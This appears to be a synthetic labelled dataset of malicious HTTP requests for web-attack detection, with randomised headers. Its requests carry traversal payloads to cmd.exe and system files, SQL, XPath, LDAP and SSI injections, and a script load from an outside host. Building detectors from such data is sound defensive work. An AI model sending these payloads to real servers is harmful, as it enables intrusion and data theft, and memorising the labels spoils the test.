GET /9hw4OxLDXtg1h/vWNtE7I45/dn/4epyeradofgearn5Etm/yewP4ng7gy/peAoadl2rc3tiibnO/envtirazisg3uyzf5/7.nPR.jpg?uysnAurmy=9w&2Ueani1=207&seubiHcae=toae+tfel17Rrlr&Cdaahjiic=012&6Djh=1oisi4&foninafnshjne=hSTSyO53kVZS&InJot=gag&xrehbmsoxceer=qQhUP&tntoya5nate=526294&etpaezotcmwa=4%2B&nGsRhneu1naine=forj&PB9eC=5949116&cp=ipo&rjZdt=3479092&kQ-VaSv=aia%2Bzea HTTP/1.1
Host: www.tasmqao.de
Connection: keep-alive
Accept: video/*, audio/x-wav;q=0.4, image/*
Accept-Charset: x-mac-ce, x-mac-korean;q=0.4, iso-8859-3
Accept-Encoding: *
Accept-Language: 9-x, i4heir-G7donv, tnitt-i7orss;q=0.1
Cache-Control: r=eeuPrpn
Client-ip: 51.173.51.38
Cookie: anfrAre=5;eed5eieinxee=oFX;3ieeht=tj;srwacn5csaatsj=<div  style    =   "     behaviour:   url([http://www.delantte.com/script/lodplhxeb.cgi]);  "    >
Cookie2: $Version="460"
Date: Wed, 13 Oct 04 18:08:29 CET
ETag: W/"7U1jaltsL_Bh9D83"
Expect: lisn=aisuaoe
From: ostn@eiEInxoue.gov
If-Modified-Since: Tue, 16 Feb 10 13:11:57 CET
If-Unmodified-Since: Fri, 26 Oct 07 06:15:41 GMT
If-Match: "1CD767TqA7KbP7uF_L"
If-None-Match: "pNsQFdEXDFgfBnsGWQ"
If-Range: Sat, 13 Jan 07 22:56:01 UTC
Max-Forwards: 3
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: Basic T2dkbTp0bWh1d2c=
Authorization: Basic YTN0cTpkdGVo
Range: -86769,3-4,-55130
Referer: http://www.vo6gdca.biz/qlli/d2udrdr/e901Ur4j/uw4sRoh.php3
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 9.9; ie-ew; rv:5.7.6) Gecko/57231848
UA-CPU: StrongARM
UA-Disp: 7583,8873,32
UA-OS: FreeBSD
UA-Pixels: 7522x520
Via: 9.9 161.97.202.42, Zasfew/3.3 www.k8hl7k.shtml
Transfer-Encoding: 6oea
Upgrade: ejac/8.8, baveD/4.5, eephoe/6.8
Warning: 065 1.170.183.134 "iArxist9tarxdhsydeA" "Tue, 04 Apr 06 03:43:59 UTC"
X-Forwarded-For: 156.92.186.251
X-Serial-Number: 6715538420
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 46716
Start - Id: 44237
class: OsCommanding
GET /msadc/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 105.78.234.85
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.9
Accept-Language: h4edst-teaeeeie, enRqcopo-edocae, iezhWhe-mrenqars
Cache-Control: min-fresh=40
Client-ip: 157.29.164.15
Cookie: coit4elcsbneac=228;c0uwe2e=5596737
Cookie2: $Version="9"
Date: Fri, 06 Nov 09 06:43:19 GMT
ETag: W/"ZSz6CGXGK.XnFvDbA3Ds"
Expect: 100-continue
From: ided@udhoes.uk
If-Modified-Since: Wed, 01 Mar 06 01:04:52 CET
If-Unmodified-Since: Mon, 07 Mar 05 11:34:53 CET
If-Match: *
If-None-Match: "vmSzjvsbfVWl4hr"
If-Range: *
Max-Forwards: 626
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: Basic aHRybng6ZWxMYQ==
Authorization: tOde nurp1=vlcwt
Range: 672-
Referer: /eetrndbo/xyqb/Fs2Ohdn/iiteerx/easBhoR.js
TE: gzip;q=0.7
Trailer: Proxy-Authorization
User-Agent: t0UFohdrylcwzqea3
UA-CPU: x86
UA-Disp: 220,5543,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 352x848
Via: ope/1.8 62.62.143.236:28778, meretn/5.3 www.sro8rN.shtml
Transfer-Encoding: gzip
Upgrade: eylet/4.8, moe/0.2, jtiu/7.5, ratas/1.7, ott/5.5
Warning: 992 www.i1e3itee.jpg "capc8tz" 
X-Forwarded-For: 242.235.213.130
X-Serial-Number: 33909969
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44237
Start - Id: 45889
class: PathTransversal
GET /ctleIda0oguke/llk2B16--0.ekNE/aaeea/bGQbU7E5v3LHW9KP.mspx?BXqHfJXti2C=d%3A%5Cwinnt%5Cboot.ini&iiteOan=sevcuS%40likehjr%29rdes&tPiaerenr5=e9iiOpisjod&agtPsom=9603556306 HTTP/1.0
Host: 105.62.18.110
Connection: close
Accept: video/*, audio/*
Accept-Charset: x-mac-ce, euc-jp, iso-8859-1, iso-8859-9;q=0.0
Accept-Encoding: compress, gzip;q=0.2, compress;q=0.4, gzip, gzip;q=0.9
Accept-Language: dmseR-ocaa, nhn-xelu;q=0.0, Ue-caneals
Cache-Control: no-store
Client-ip: 174.163.182.93
Cookie: eadr=fihaiwle;acsrrkngie=07;2YDgroup byKrM=575;MJZbaEf@j-EI=b9Otb;idlHne4lehelf=trihm;I6ftpoA%uo=mh%7Ca
Cookie2: $Version="33"
Date: Thu, 06 May 04 05:57:51 CET
ETag: W/"@9PfQx8cIAjptFMfc"
Expect: 100-continue
From: erymey@jq6fn.org
If-Modified-Since: Fri, 28 Nov 08 15:33:18 GMT
If-Unmodified-Since: Thu, 01 Nov 07 13:43:47 CET
If-Match: "YjPVrmyfY.f2_wnQPW2-"
If-None-Match: "iQ4joX.SwtlLrsnm1I"
If-Range: Tue, 03 May 05 23:11:10 CET
Max-Forwards: 3
MIME-Version: 5.1
Pragma: q=naa
Proxy-Authorization: NTLM bXJzYXBhbGFnZ25vNnQ2YXJhc050bnNoZUttZktzcm0=
Authorization: RsBe h3em=leSos5t
Range: 58-182597,4-9
Referer: /eeDe/ae1rg8yw/asaOneoo/aoazevu.msf
TE: trailers
Trailer: TE
User-Agent: Mozilla/0.9 (X11; U; Solaris 0.7; ee-sd; rv:8.2.0) Gecko/12269113
UA-CPU: StrongARM
UA-Disp: 567,3273,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 0549x672
Via: ooieti/9.3 88.252.154.57
Transfer-Encoding: identity
Upgrade: srd/2.1, trlx/7.5, fh7e/2.0, xDtero/2.4
Warning: 813 www.vtuj27.png "rsxiUrrhinfa" "Sun, 10 Aug 08 15:25:17 UTC"
X-Forwarded-For: 39.173.242.210
X-Serial-Number: 42462997439342204016
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45889
Start - Id: 42830
class: OsCommanding
GET /g2vdiv/bgweouw/d.GR.0CSmf88eptCUd/k9RJusrUVecl.css?hcs=h%3Baunion&KZ2Kuanz8=ihXtcNCExP&a17=163&7bdTdsw8aa7eexv=abhenoOnTa&euylKxr=%7C+++dir+..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C+++++%2C HTTP/1.1
Host: www.guhf.com
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 188.218.7.177
Cookie: tyuhii=835734;ieszaizpiiiel=38;xtermyF.G@positionNC=60895475;nt7ohlSbObpa8r=sogtmpake'fi$nph-<
Date: Thu, 03 Nov 05 02:37:08 UTC
Expect: bIief
From: deCV@nnnan.ch
If-Modified-Since: Mon, 16 Nov 09 23:24:18 GMT
If-Unmodified-Since: Mon, 16 Nov 09 11:20:49 UTC
If-Match: "qI24.dZDibJe3hmEe"
If-None-Match: "pSry5L@RU1Njqt5w"
If-Range: Sat, 21 Jul 07 21:44:10 GMT
Max-Forwards: 3
MIME-Version: 5.9
Authorization: Basic c3RRbnJzbzppZGxSeDBsWQ==
Range: 2-3,62-,037879-912
Referer: http://IhGo.ch/doeEu/meqHtocw/5a7Ott/2hej/rolbtnr.swf
TE: trailers,chunked
Trailer: Host
User-Agent: h4IiwUGnVS http://www.y7aiati.ch
UA-Color: color16
Via: HTTP/6.9 www.oNss.html:3, bte/6.5 168.41.44.75, HTTP/6.2 249.90.77.235
Transfer-Encoding: deflate
Upgrade: bnrh/3.5, tht/4.4, eRslr/7.1, uitl/9.3, nply/0.8
X-Forwarded-For: 193.174.253.14
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42830
Start - Id: 35168
class: SqlInjection
GET /i_WqqA/a-Q2qSK3W.15.z/camnd/gMqzV7qifn/cosEebtiu4asi/updateSja.sh?sdcrnelca=880&snrt7y=tnKek9&ddem=inEt&Twkeo=xhexecF4&wiHuc3w=eelallomhy%5Drh%5C+siPi&fia=36658&idqBGT6XuFO=arlotorda%27++++UNION++ALL++SELECT+9ererLwe+++FROM++++Aeay+++++WHERE+%27%27+%3D++%27&epcaxtnaaoaUe4=bR1Hwo9utyeauumd&woa8mst8=t+ttmp&wihhti=pEn&eAUtJ92made=3236797 HTTP/1.1
Host: 65.232.204.28
Connection: keep-alive
Accept: image/*
Accept-Charset: *
Accept-Encoding: compress;q=0.4, compress
Accept-Language: tltosin-7amsenn;q=0.7, dni-oiea;q=0.8, ns4era-eu, mNwsado-idas;q=0.9
Cache-Control: max-age=0
Client-ip: 86.6.34.68
Cookie: bhatTchgtrryedM=ax4eqesr9Rw;Km6KoQJ=esLilyDect;eTkm72hrs=82118
Cookie2: $Version="98"
Date: Fri, 01 Aug 08 17:23:15 CET
ETag: "yVk20OLqWyt55fRiFtBZ"
If-Modified-Since: Sun, 11 Apr 04 18:41:59 CET
If-Unmodified-Since: Thu, 19 Oct 06 03:33:41 CET
If-Match: "WdVDQvzaxrHTD_KeT"
If-None-Match: "9EODIf_qekawsoJeHJxT"
If-Range: *
Max-Forwards: 379
Proxy-Authorization: Digest realm
Range: 97412-
Referer: /rhndbvne/ieomfna/diemlhil/Ldseti.js
User-Agent: Mozilla/3.8 (Machintosh; U; PPC Mac OS X 5.4; tn-mt; rv:6.3.1) Gecko/56924665
Via: io4qa/2.6 164.179.7.27, 1.2 www.tcaaipOo.shtml:6
Transfer-Encoding: deflate
Warning: 749 www.DeYsfD6.gif:90 "Albacnauthecopstseao" "Mon, 14 Feb 05 18:04:54 CET"

null

End - Id: 35168
Start - Id: 49205
class: XPathInjection
GET /soU.HHg1/na/nWYqxhTYSK912z/tlMisA@leNr2CMs1n.js?Twtm=irh%2Ftlld6%2Freeon%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D16%5D+++++or++%27m0%27++%3D+++%27 HTTP/1.1
Host: www.otniyhI.net
Connection: 87k9tc5
Accept: text/plain;q=0.3, image/*, video/quicktime
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: rhi6mN-ep, gaE-8hrdiam
Cache-Control: no-store
Client-ip: 0.187.188.191
Cookie: dtwlri=8 tt98)|anl;ndt4p=?link\likeem'pr%Eu9Rr8-Yea;tn3=yHJCzARfzq;hsvn=tSapobceznnkues;rrauOah4arqui=iJ@inarpassthruRtn7idekuinput$;SDHWpJ=aH2t7
Cookie2: $Version="2"
Date: Fri, 12 May 06 21:41:10 GMT
ETag: "_DeHBysckI4RzyNKLtM"
Expect: kwohSom
From: Gswzt6t2@seem.gov
If-Modified-Since: Tue, 13 Oct 09 23:18:33 GMT
If-Unmodified-Since: Mon, 02 Jun 08 23:20:41 CET
If-Match: "csPAXmiaHf_Gus0"
If-None-Match: *
If-Range: Thu, 24 Apr 08 20:09:51 CET
Max-Forwards: 63
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: Basic MWd0YTpydGplZWl3
Authorization: Basic cHJybjo3b21JaXI=
Range: -392691
Referer: /Ytete3/tnti0/1ptsn.tar
TE: trailers,deflate;q=0.2,deflate
Trailer: Authorization
User-Agent: Mozilla/2.6 (Machintosh; U; PPC 5.2; ds-ew; rv:2.6.0) Gecko/22459640
UA-CPU: 68000
UA-Disp: 2354,727,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 6245x946
Via: 8.2 25.152.84.181, 2.1 135.117.29.145, FTP/4.0 230.172.96.139
Transfer-Encoding: compress
Upgrade: wtrfa/2.8, tto/9.5, nvs/5.2
Warning: 738 www.iaeo.png "RrzpoiHnn" "Fri, 27 Feb 09 20:57:20 CET"
X-Forwarded-For: 243.220.220.113
X-Serial-Number: 094897870
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49205
Start - Id: 40594
class: SSI
GET /rkh/RIcklg4ecgdjmr5chhiw/E4734wCHtDSlogI/dro/wUZAaz2s/0npHssoaurrwlrhsk/0n5rHhsbuiDettUIomE/CbinXa@psQqHe1f3M/eecnraaYhoccde/gtl.shtml?2Gfstefdsaeri=S7&f6re=%7C&ekrtttnhft=d5f8a5xho&G2ZI2NLYh1U=c8a4f&e9kSjt0Nzl8=zqZ0A&lsNfL0B=%3C%21--++++%23include+++++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22+--%3E&hesieoeeiosol=I%3Eojsu%2Bspe&e1traniittl=evhitaesm1itobgO3+rp&EjZ9mE=ezi%2B&rcz=491436714&eHed=hYt&1skrmzez=wgetaWi2j6+lsaD&o6esu5acikai6=963336&0onQw=aOR7_.ds&EkDeOtic5e=as HTTP/1.1
Host: 112.176.95.87:80
Connection: close
Accept: */*;q=0.0
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: no-store
Client-ip: 243.103.15.191
Cookie: tcaps4ihdtee=24628
Cookie2: $Version="59"
Date: Mon, 08 Aug 05 15:46:43 UTC
ETag: W/"bb110ijb0AjJQj0"
Expect: 100-continue
From: rboa@y3rzvAlmvo.org
If-Modified-Since: Sun, 17 Dec 06 15:15:13 UTC
If-Unmodified-Since: Thu, 17 Mar 05 20:45:32 UTC
If-Match: "O26NG3kaBELbogXVtt-R"
If-None-Match: *
If-Range: *
Max-Forwards: 4004
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: Digest algorithm=ekoie
Authorization: Digest response="E77Aea6332dC4Ea1d7Ce3caf337cCAd4"
Range: 67529-
Referer: /aeostdu5/flss/esnur/fs1he/iit3eh.txt
TE: gzip;q=0.3
Trailer: Warning
User-Agent: Mozilla/1.9 (Machintosh; U; Mac OS X 4.8; bd-eu; rv:3.3.0) Gecko/79182347
UA-CPU: StrongARM
UA-Disp: 2015,473,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 7337x662
Via: HTTP/5.5 227.162.179.69
Transfer-Encoding: deflate
Upgrade: sez4st/8.2, mnseuu/1.0, fszf/8.0
Warning: 305 210.240.173.34 "ntioprsmAicmwedcere" "Sat, 11 Dec 04 18:18:56 UTC"
X-Forwarded-For: 142.48.24.138
X-Serial-Number: 69115
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40594
Start - Id: 41337
class: SqlInjection
GET /stkelER/1--_fU16e.9nJA@/ysiIlAnqrz/3LTa8sf/o7PwLRusock_streamneg1dZR/danoIdsyihadhPie/lcSZML@o/7j8hEVYAxyjVXuN5I7I.jpg?0@QRhtpassP5ZE=Ao+jaser&xNhko_Zb-_dq=bint&ygg=n&0hiininie=58473314&AxAX@6_=ptivaan&form4vbscriptCWUJV_y9=1&oOofvoiwaeec=9&sogS5by=976083&elthTsoroms=er-E4YXZ&sr6am=57148052&HtHdnakdynr=%26sw%2F&pas1rEssErgcaie=sS7%7C%7Cshe%5Cbvb%3D&6m=846452352&rttrTtgquas=%3Eh%40oos%278e%3Cs%3Caubj02 HTTP/1.0
Host: 98.249.49.196:82384
Connection: keep-alive
Accept: audio/basic;q=0.7
Accept-Charset: iso-8859-6;q=0.9, iso-8859-8, iso-8859-3
Accept-Encoding: *
Accept-Language: *
Cache-Control: dg='ex'
Client-ip: 87.232.160.255
Cookie: c0GPfzLb=928329;tia='; insert    into     itoeectw    values(666,'mei','TlIteiad',0xfffff);liire=eraiwd Ttaeishutdowno;1nrinnnemezni=ce
Cookie2: $Version="717"
Date: Sun, 20 Nov 05 06:25:32 CET
ETag: W/"cKDNr8CH.0z91yq@kFD"
Expect: 100-continue
From: oprs@hshefehi.biz
If-Modified-Since: Fri, 16 Jul 04 15:04:15 GMT
If-Unmodified-Since: Mon, 22 Nov 04 06:31:19 UTC
If-Match: "m9vQSq0N3zkNJQcV0t"
If-None-Match: "BAhw7m.T1rD981SwL"
If-Range: Sat, 21 Aug 04 11:01:08 CET
Max-Forwards: 27
Pragma: tisu=dh
Authorization: Basic ZnN4aWV1dTp4bXRleHJxbA==
Range: 481797-7272,-0
Referer: http://luravebo.de/gp3nspgS.png
TE: trailers
Trailer: From
User-Agent: ayeenatu (e1Yaxwf; eOlif9k; nVGM2n9; aYTC5LDfDn; eVKgkBmHGo)
UA-Color: color32
UA-Pixels: 5806x8288
Transfer-Encoding: identity
Upgrade: lrh3x/8.6
Warning: 221 www.ieHmnseN.shtml "tc0exeLby" "Thu, 15 Apr 10 21:19:31 UTC"
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 41337
Start - Id: 44226
class: OsCommanding
GET ..��...��..��..��..��../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.fleihP.gov:80
Connection: toayna
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: max-stale
Client-ip: 224.86.31.255
Cookie: coit4elcsbneac=228;c0uwe2e=5596737
Cookie2: $Version="93"
Date: Sat, 22 Aug 09 08:30:11 UTC
ETag: "YbIP.iawOLfpBceJ7ne"
Expect: L2fr=taeh2;o6alf
From: 37idSerd@ombp.uk
If-Modified-Since: Sun, 05 Sep 04 24:15:02 GMT
If-Unmodified-Since: Sun, 18 Mar 07 17:17:15 GMT
If-Match: *
If-None-Match: "r4ESYJlWLnUn0xJQgv67"
If-Range: "sfj@VJX@v8_BJpBn@uF"
Max-Forwards: 6119
MIME-Version: 1.8
Pragma: NuD='0dtugo9'
Proxy-Authorization: 6sNnyd isiMcw=RxsQAe
Authorization: Digest qop=auth-int
Range: 09660-850419
Referer: /e4ieg/tXAanlOx/vvu0avah/rmg7wma/reiiwvt.cgi
TE: deflate,trailers
Trailer: Proxy-Authorization
User-Agent: Liul1anetiMoxruNe
UA-CPU: PowerPC
UA-Disp: 220,5543,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 352x848
Via: 2.7 218.127.34.24
Transfer-Encoding: eioon; ioTauWiM=aiit3ka
Upgrade: eylet/4.8, moe/0.2, jtiu/7.5, ratas/1.7, ott/5.5
Warning: 096 42.244.161.150:67 "Tarraeaaint" "Sat, 16 Oct 04 16:51:00 GMT"
X-Forwarded-For: 65.185.122.174
X-Serial-Number: 33909969
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 44226
Start - Id: 38172
class: LdapInjection
GET /bPhZgtM4w5yfPQK/oodvTsooRcrtlaa/PTrhntjaRoeSt/lWSZT5R_1MWAJ93N77w/hye.html?7e0rathws=eh9e%29%28++%7C++%28tp%3D*%29&kKservicesF8tUeURhg=18&2se=doyiwarEmEObersf9K&Oe4rdi9aejrgo=InoX%3Axhubvo&mAdase=828513&nhneoortj03=r%3EtalvWRww&.mperlSiframeO5jCtRinclude=+hw5mfdSt4ezwgeoQ%7E&3hYuyIslobjectwQ=Lurthoi4ehm&aebltsem0oyt7=lkIg&uFa4etea=e4ouuiu9n8laomochae HTTP/1.1
Host: www.misetau.biz
Connection: close
Accept: image/gif, audio/*, image/jpeg;q=0.0
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.5
Accept-Language: reo-eEhaLwe;q=0.1, wl-6hbo, R-atitcS;q=0.3, Ltefh-toqrora;q=0.8
Cache-Control: max-age=76
Client-ip: 170.20.121.37
Cookie: e6wtesdsc=aNvBe_cNkq;imgbody.Eq=a2ow93airur9e1;fhnevit=Mi;Daccess_logEA=xs@sOwinnt(
Cookie2: $Version="5"
Date: Mon, 03 Aug 09 04:04:51 CET
ETag: W/"vvFa0fGEYN0n5p.x"
Expect: itgdtcl=icezz
From: dipgxt@5huagprh.de
If-Modified-Since: Fri, 23 Apr 04 12:46:10 UTC
If-Unmodified-Since: Tue, 16 May 06 10:59:16 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 23 Apr 06 19:04:29 UTC
Max-Forwards: 626
MIME-Version: 9.9
Pragma: rntsl=ie4E
Proxy-Authorization: Basic Z3JzYXNlMDplb2hzNWtxZA==
Authorization: Digest opaque="apo2Yo"
Range: -58269,-622
Referer: /I2mey/gTFtz/htWe/loaausel/aR5ip.tar.gz
TE: trailers,trailers,trailers
Trailer: Via
User-Agent: Mozilla/1.2 (compatible; Konqueror/3.0; Unix; todapie; x3EInt)
UA-CPU: PowerPC
UA-Disp: 776,149,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 411x727
Via: 0.7 www.Bzmztzs4.tiff, gow/4.4 252.47.72.194
Transfer-Encoding: sctr
Upgrade: nume/0.6, Uma/7.3
Warning: 607 www.RgHm.tiff "solih9ny" 
X-Forwarded-For: 105.91.132.113
X-Serial-Number: 276586158043
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 38172
Start - Id: 49807
class: XPathInjection
GET /ey4pC/bincqrGmnsbEhs9ctya.nsf?soq=nauo&TFFZmobjectnelspassthrub=4897&7jNySC=2&aAz8lLsa=+&7fmmnsr=eLKBf5_bmLzZ&lm=s&IGlyeoBrgdtir=I6jebtootr&5U=ar%27ih&WPChtpassNY9KhavingK=3&8ieqnh=9564&_NcWCO9-=oaln9nei%27++++or++++3uosa%2FerPnd%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D71%5D+or+%27oaeT%27+%3D+%27&A1peovied=exd%3Et&se7eitte=t2o-0gxgroup+bytr%40sj&qwherebVacO@p=7 HTTP/1.1
Host: www.eOre.biz
Connection: aeyh39rn
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: compress, gzip;q=0.5, deflate;q=0.7
Accept-Language: epe605t-nenlsfe, 9EgbCb3-s, xdeioaR-keOe
Cache-Control: only-if-cached
Client-ip: 41.236.97.233
Cookie: diolt7loaati=dica5sueyemoie2d;Vi-4GT05_=66521;de=28;sMuw=760813281;nyasuerpzd1ahs=wiJrlVPkM;rciaaxo=80
Cookie2: $Version="01"
Date: Sat, 31 Dec 05 24:16:10 GMT
ETag: "kdW8H_eGzQ8nREBeLA"
Expect: 100-continue
From: rtelms@eo74lfn.ch
If-Modified-Since: Sat, 10 May 08 11:26:41 CET
If-Unmodified-Since: Tue, 24 Mar 09 15:19:08 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 5
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: creww rhlhoo=anoa
Range: 1-,586-,-3399
Referer: http://w1raeis.it/2ehhc5/vebwy/ideers/Nthcltxo.js
TE: chunked,deflate;q=0.3
Trailer: Accept-Encoding
User-Agent: atarljegetOnejES5
UA-CPU: MIPS
UA-Disp: 662,518,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 172x6984
Via: 0.8 www.rohfssW6.js, 5.6 233.4.8.123
Transfer-Encoding: identity
Upgrade: oticr3/9.7
Warning: 295 41.145.9.69 "ali9sAg6ha" 
X-Forwarded-For: 103.42.254.96
X-Serial-Number: 09611302404410791541
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49807
Start - Id: 46347
class: PathTransversal
GET /ra2LaV8Y3DfFS@/ator/AhA/mvQz/szixyhao4ngoeqfad7/etTkJWMiVxvoR8s/nrhOJ1/1document2YMfb.WpDzW/absttgsdutorur2O.php4?pos3=pzsltu2amTy&aA=iprocessing-instruction&hceaat=iit&rattshscps=5788026&sdntln0wetd=3520509&itajriiLre=5&rvweasa=pt8c&ew6Aei=ashs%29iwsas&yodhlL91ceea=9GzI3&8AOZqZKTcmdmt=%2Fetc%2Fhttpd%2Fhttpd.conf&cjiumhss9wm=078&WDa7su5oeesixM=18669&K3D0=1414856&h5mU.include=06360416 HTTP/1.1
Host: www.btrnaEctt.org:18563
Connection: close
Accept: video/*, text/plain;q=0.4, application/x-tar;q=0.8
Accept-Charset: *;q=0.1
Accept-Encoding: compress, deflate, deflate, identity
Accept-Language: *
Cache-Control: no-transform
Client-ip: 51.115.37.124
Cookie2: $Version="19"
Date: Tue, 14 Sep 04 17:07:06 GMT
ETag: "8loGsYRk@@ghoB6Ow6"
Expect: 100-continue
If-Modified-Since: Tue, 12 Jan 10 01:52:16 CET
If-Match: "1wShDBD3.uZUumC.8f"
If-None-Match: *
If-Range: Tue, 13 Dec 05 05:07:16 CET
Max-Forwards: 416
Authorization: Basic bHMyMzpVbDFzYWU=
Referer: http://www.ixoueho.be/pauTg/lsTNsll5/mexibde/yrmods9.gz
TE: deflate,trailers,gzip
Trailer: Proxy-Authorization
User-Agent: Mozilla/5.0 (X11; U; Linux i386 6.5; eI-sy; rv:0.6.8) Gecko/76366233
UA-Pixels: 648x2225
Via: HTTP/6.5 10.254.153.19
Transfer-Encoding: deflate
Warning: 509 www.f1ut.tiff "malgniTQtiqropjr" "Thu, 13 Mar 08 14:37:17 GMT"

null

End - Id: 46347
Start - Id: 35580
class: XPathInjection
GET /FWN4mnl-locationYk_zpZ/szuh9Z.8o-Nq1ysp9n/peyceR6tienndr/oJ_9Mc/4CM6@6H5/0wtv3emfheesf/2ojlocationVuboot.iniZH7/a@WDJJYzKNYmoeq2TxP/cO..HNx3x14CV.exe?li2nuciaia7x=ojaub%27%5D+++%7C+++P++%7C+++++%2F%2Fuser%5B+name%2Ftext%28+%29++%3D+%27scid HTTP/1.1
Host: www.g7sxilaerd.org:80
Connection: close
Accept: image/*
Accept-Charset: ks_c_5601-1987, iso-8859-9, cp-936;q=0.0
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale=50554
Client-ip: 252.234.242.120
Cookie: skelweae=gVab;kArg1UR39W.Q=cu3RA3wtJllY;aTesim9Ytdltcqs=9;roytsij=8
Date: Thu, 22 Oct 09 11:45:09 GMT
ETag: W/"hI@P2lhb.9ij7_jV"
Expect: 100-continue
If-Modified-Since: Thu, 04 Oct 07 13:16:26 GMT
If-Unmodified-Since: Tue, 07 Sep 04 06:14:54 UTC
If-Match: "ShnD2NkYPCwI-Pnxb"
If-None-Match: *
If-Range: Tue, 01 Jun 04 09:16:46 GMT
Max-Forwards: 245
MIME-Version: 1.5
Pragma: Aoo6='al'
Authorization: Digest qop=ethn
Range: 1278-6
Referer: http://www.1StFr.cz/ashfeDh/nohi/pgtwp/m3nttdmb.htm
TE: trailers,chunked;q=0.6,deflate;q=0.2
User-Agent: trpaunTag5 (s4UN6@7oKn; mM1eep; gZDxBY; oVv7-Jit2; wVP_lNkbG)
UA-OS: Solaris
Via: 0.5 www.rathrte.css
Transfer-Encoding: deflate
Upgrade: qqbAbn/3.5, de6/4.4, i7xow/6.7
X-Forwarded-For: 245.111.237.199
X-Serial-Number: 36638700307195
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 35580
Start - Id: 37456
class: LdapInjection
GET /rorfRrPuwobfaeohIw/rhaving7m_rmVJ/AJ7zxHXKk4/NEYH221lYQS9TD/MdiframeN.75/t6f/Z3/ot3Aay.asmx?3RbnhwhBea=oja&gloedqseioln=++i%26o&5wr0htaccesMBOG=p%3ES8A+tftp&bg4=Lcoi96dsts9tdtiy5 HTTP/1.1
Host: www.Aoocanue.fr
Connection: lRlmno
Accept: video/*;q=0.1, audio/*;q=0.2
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: unsfrne-e, eFn-n, stsxo0-rl, dhpn5bos-b4oguh
Cache-Control: max-stale=940
Client-ip: 64.57.122.77
Cookie: cygsuohbol2rgB= aerIcui;g2Vscr1nai=")(targetfilter=(o=NetscapeRoot));d1w6edjmhdtb=es3ssoca;woa5topsta6SE=9873212669
Cookie2: $Version="894"
Date: Sat, 07 Oct 06 15:32:39 UTC
ETag: W/"ZszLNnwcsJ1baB-TTfMt"
Expect: 100-continue
From: cdnol@lztd.biz
If-Modified-Since: Thu, 17 May 07 13:15:26 UTC
If-Unmodified-Since: Thu, 18 May 06 07:57:22 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 4
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: Basic Z3lzZWVycDplMGVibjA=
Authorization: Basic aWxnck9lYWE6c2xobw==
Range: -85,-288767
Referer: /ui7ir.exe
TE: trailers,gzip
Trailer: Proxy-Authorization
User-Agent: nnceaadn (ajxtCoc; sMVhDrXRRO; s83K-l72; e5sNQWOv)
UA-CPU: MIPS
UA-Disp: 732,386,8
UA-Pixels: 161x1713
Via: 5.3 www.nl7rlho.htm, ABaoe9/3.3 55.149.28.157
Transfer-Encoding: epdh
Upgrade: aoeac/3.0, iatoE/2.1, a6wo/3.8, e9e/4.3
Warning: 886 5.35.222.218 "heval7tanRnTas" "Mon, 03 Jul 06 13:38:22 UTC"
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37456
Start - Id: 36800
class: OsCommanding
